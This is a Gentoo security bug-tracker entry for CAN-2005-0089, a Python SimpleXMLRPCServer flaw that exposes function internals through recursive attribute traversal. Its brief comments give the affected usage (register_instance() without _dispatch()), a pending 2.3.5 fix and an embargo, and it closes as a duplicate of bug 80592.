Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 80094 - dev-lang/python CAN-2005-0089 (Vendor-Sec)
Summary: dev-lang/python CAN-2005-0089 (Vendor-Sec)
Status: RESOLVED DUPLICATE of bug 80592
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High normal (vote)
Assignee: Gentoo Security
Whiteboard: A2? [upstream] / CLASSIFIED 20050203
Depends on:
Reported: 2005-01-30 09:27 UTC by Sune Kloppenborg Jeppesen (RETIRED)
Modified: 2008-04-23 08:11 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-01-30 09:27:27 UTC
The Python folks have discovered a flaw in SimpleXMLRPCServer that can
affect any XML-RPC servers.  This affects any programs have been written
that allow remote untrusted users to do unrestricted traversal and can 
allow them to access or change function internals using the im_* and 
func_* attributes.
Comment 1 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-01-30 09:28:59 UTC
2.3.5 will be released soon to fix this problem.
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-01-30 22:24:28 UTC
The exploit only works when
register_instance() is called with an instance that does not implement
_dispatch(). XML-RPC servers that use register_function() instead of
register_instance() are not vulnerable. Unfortunately most XML-RPC
tutorials use register_instance() without pointing out the recursive
traversal feature.
Comment 3 Thierry Carrez (RETIRED) gentoo-dev 2005-02-03 02:59:00 UTC
Embargo until 1600 UTC today.
See advisory and patches @
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2005-02-03 08:45:47 UTC
Now public on bug 80592

*** This bug has been marked as a duplicate of 80592 ***